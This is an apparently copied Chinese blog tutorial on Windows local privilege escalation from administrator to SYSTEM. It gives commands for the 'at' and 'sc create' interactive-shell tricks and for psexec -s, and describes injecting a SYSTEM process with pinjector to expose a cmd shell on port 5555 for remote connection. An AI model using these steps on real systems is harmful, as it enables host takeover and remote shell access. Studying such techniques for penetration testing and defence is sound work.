本地提权

可以看见这里我们是administrator 我们要提升到system

本地提权

0X0a at命令提权

at xx:xx(时间)\interactive cmd

本地提权

本地提权

不适用于 win2008以后的版本

0x0bSC命令提权

•    sc Create syscmd binPath= "cmd /K start" type= own type= interact 
•    sc start syscmd

 

 本地提权

本地提权

0X0C WINDOWS内核提权

•    系统设置管理功能 
•    SysInternal Suite 
•    https://technet.microsoft.com/en-us/sysinternals/bb545027 下载地址
•    psexec -i -s -d taskmgr

本地提权

0X02注入进程提权

本地提权

 

 看见是system进行的进程 我们的目的是将我们的进程注入到任意的system执行的进程里面这样我们的权限就是system权限了

pinjector.exe -l 查看当前可以注入的进程

本地提权

然后我们外网直接连接目标ip的5555端口就是cmd界面了

本地提权

 

 看见直接成功了

 

这有点类似于 nc提权

相关文章:

  • 2021-08-25
  • 2021-06-11
  • 2022-01-17
  • 2021-07-03
  • 2022-01-23
  • 2021-07-15
  • 2021-09-21
  • 2021-05-14
猜你喜欢
  • 2022-12-23
  • 2021-10-15
  • 2021-08-09
  • 2021-10-04
  • 2022-12-23
  • 2021-06-23
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode